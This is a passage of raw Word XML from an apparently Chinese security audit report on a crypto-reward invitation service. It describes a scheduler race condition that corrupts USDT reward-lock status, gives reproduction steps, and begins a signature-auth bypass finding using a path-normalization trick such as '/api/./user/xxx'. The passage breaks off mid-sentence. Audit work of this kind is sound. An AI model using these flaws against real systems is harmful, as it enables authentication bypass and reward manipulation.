          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>UsdtUserConfig.completionStatus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 控制 USDT 奖池三把锁的解锁状态；该状态的计算结果直接决定邀请人能否领取对应层级的 USDT 奖励。竞态写入可导致：(1) 奖池锁应解锁时未解锁（邀请人无法领取已应得的 USDT）；(2) 分布式重复执行导致下游奖励分发逻辑被触发多次（若分发逻辑非幂等，邀请人可能多次领取同一层级奖励）。</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定时任务入口：UserScheduler.java — 无分布式锁</w:t>
              <w:br/>
              <w:t>@Scheduled(fixedRate = 10 * 60 * 1000L)  // ← 多节点同时触发，无 @SchedulerLock 或等价分布式锁</w:t>
              <w:br/>
              <w:t>public void userKycVerifiedTask() {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // 多节点同时查询同一批未完成KYC用户，结果完全相同</w:t>
              <w:br/>
              <w:t xml:space="preserve">    var users = userRepository.findByIsNewUserAndIsKycVerifiedAndOpenIdIsNotNullAndInviterCodeIsNotNull(0, 0);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    for (User user : users) {  // ← 每个节点各自遍历同一批用户</w:t>
              <w:br/>
              <w:t xml:space="preserve">        try {</w:t>
              <w:br/>
              <w:t xml:space="preserve">            ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">            if (c2PassFlag) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                user.setIsKycVerified(1);</w:t>
              <w:br/>
              <w:t xml:space="preserve">                userRepository.save(user);  // ← 多节点重复写，最终结果幂等，但下方业务调用不幂等</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">                // ⚠️ 以下三处在多节点下均被重复执行</w:t>
              <w:br/>
              <w:t xml:space="preserve">                shareService.shareLevel3Success(inviterUserId, user.getId());  // ← 重复触发，实现未包含在上下文中，无法判定是否幂等</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">                // check-then-create 竞态：两节点同时 find 到 empty，各自 new 并 save，产生重复记录</w:t>
              <w:br/>
              <w:t xml:space="preserve">                UserInvitationRecord record = userInvitationRecordRepository</w:t>
              <w:br/>
              <w:t xml:space="preserve">                    .findByInviterUserIdAndInviteeUserId(inviterUserId, user.getId())  // ← 节点A/B同时读到空</w:t>
              <w:br/>
              <w:t xml:space="preserve">                    .orElseGet(() -&gt; { ... return r; });  // ← 节点A/B各自创建新记录</w:t>
              <w:br/>
              <w:t xml:space="preserve">                userInvitationRecordRepository.save(record);  // ← 写入重复记录</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">                refreshInviterUsdtConfigByKycAndDeposit(inviterUserId);  // ← 关键：并发调用，见下方</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">                // InviterStarRecord check-then-create 同理存在竞态</w:t>
              <w:br/>
              <w:t xml:space="preserve">                if (inviterStarRecordRepository.findByInviterUserIdAndInviteeUserId(inviterUserId, user.getId()).isEmpty()) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                    // ← 两节点同时 find 到 empty → 各自保存 → 重复记录</w:t>
              <w:br/>
              <w:t xml:space="preserve">                    inviterStarRecordRepository.save(starRecord);</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">     </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">           }</w:t>
              <w:br/>
              <w:t xml:space="preserve">            }</w:t>
              <w:br/>
              <w:t xml:space="preserve">        } catch (Exception ignored) { }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② USDT 锁进度刷新：UserScheduler.java — 无 @Transactional、无行级锁</w:t>
              <w:br/>
              <w:t>private void refreshInviterUsdtConfigByKycAndDeposit(Long inviterUserId) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // 无 @Transactional 注解 ← 非原子操作</w:t>
              <w:br/>
              <w:t xml:space="preserve">    int remaining = (int) userInvitationRecordRepository</w:t>
              <w:br/>
              <w:t xml:space="preserve">        .countInviteesWithKycAndHasTraded(inviterUserId);  // ← 节点A/B读取时机不同，可能得到不同值</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    List&lt;UsdtUserConfig&gt; configs = usdtUserConfigRepository</w:t>
              <w:br/>
              <w:t xml:space="preserve">        .findByUserIdOrderByLockLevelAsc(inviterUserId);  // ← 读出相同初始状态</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    for (UsdtUserConfig config : configs) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        int target = config.getTargetProgress() != null</w:t>
              <w:br/>
              <w:t xml:space="preserve">            ? config.getTargetProgress() : config.getLockLevel();</w:t>
              <w:br/>
              <w:t xml:space="preserve">        if (remaining &gt;= target) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">            config.setCurrentProgress(target);</w:t>
              <w:br/>
              <w:t xml:space="preserve">            config.setCompletionStatus(1);  // ← USDT 锁解锁标志</w:t>
              <w:br/>
              <w:t xml:space="preserve">            remaining -= target;</w:t>
              <w:br/>
              <w:t xml:space="preserve">        } else {</w:t>
              <w:br/>
              <w:t xml:space="preserve">            config.setCurrentProgress(remaining);</w:t>
              <w:br/>
              <w:t xml:space="preserve">            config.setCompletionStatus(0);  // ← 可能将已解锁的锁错误地覆盖为未完成</w:t>
              <w:br/>
              <w:t xml:space="preserve">            remaining = 0;</w:t>
              <w:br/>
              <w:t xml:space="preserve">        }</w:t>
              <w:br/>
              <w:t xml:space="preserve">        usdtUserConfigRepository.save(config);  // ← 每条独立事务；节点间 save 顺序交错导致后写覆盖先写</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ③ 实体 setter：UsdtUserConfig.java</w:t>
              <w:br/>
              <w:t>public void setCompletionStatus(Integer completionStatus) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    this.completionStatus = completionStatus;  // ← USDT 奖池锁完成标志，被并发覆盖</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本漏洞为定时任务并发竞态缺陷，非 HTTP 可触发类型，无 POC。触发条件为多节点部署下定时任务自然执行，或同一节点内同一邀请人的多个被邀请人同时完成 KYC。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>📝 利用步骤（故障复现场景）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1394"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>确认应用以多节点方式部署（≥2 实例）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1395"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">准备同一邀请人（inviterUserId=X）下的多个被邀请用户，均处于 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>isKycVerified=0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 且 KYC 已在 CoinW 侧通过（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>c2PassFlag=true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1396"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">等待 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userKycVerifiedTask</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 在多个节点同时触发（fixedRate=10分钟）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1397"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">多节点同时处理相同的被邀请用户，并发调用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>refreshInviterUsdtConfigByKycAndDeposit(X)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1398"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">观察 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>usdt_user_config</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 表中 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>completion_status</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 字段：在并发写交错的情况下，实际达到解锁条件的 lock3 可能被后写的节点覆盖为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>completionStatus=0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，邀请人无法领取已应得的第三档 USDT 奖励；或 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>inviter_star_record</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 表出现重复记录</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>预期结果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>UsdtUserConfig.completionStatus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的最终值不稳定，取决于哪个节点最后写入；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>inviter_star_record</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>user_invitation_record</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 出现重复记录。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>⚠️ 权限要求：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1399"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>是否需要登录：否（定时任务内部触发，无外部入口）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1400"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>权限级别：无需任何外部权限，仅需应用以多节点部署，或同一调度周期内存在多个属于同一邀请人的被邀请用户同时满足 KYC 条件</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401"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>UserScheduler.java.userKycVerifiedTask → UserScheduler.java.refreshInviterUsdtConfigByKycAndDeposit → UsdtUserConfig.java.setCompletionStatus</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audit_m267_1204_userKycVerifiedTask_ctrl-path8of29.md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 Sink</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：SignAuthTestFilter.java#shouldNotFilter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_66" w:id="66"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞65：客户端签名认证绕过（Path Normalization Inconsistency）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="66"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1402"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>漏洞名称</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SignAuthTestFilter.normalizePath</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 缺少 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>StringUtils.cleanPath()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 导致签名校验可绕过</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1403"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>文件位置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>src/main/java/com/gameBack/mjservice/signtest/SignAuthTestFilter.java:shouldNotFilter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1404"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>漏洞类型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：认证绕过</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1405"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>严重程度</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：高危</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1406"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>权限要求</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：普通用户（需有效 Bearer Token）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1407"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>漏洞描述</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SignAuthTestFilter.normalizePath()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 与同项目中 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SecurityConfig.getNormalizedPath()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 及 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>TokenAuthFilter.getNormalizedPath()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 存在两处关键性不一致：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1408"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>缺少 `StringUtils.cleanPath()` 调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">：无法解析并消除路径中的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（单点）和 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>..</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（双点）片段，导致 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/api/./user/xxx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 经过该方法后仍以 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
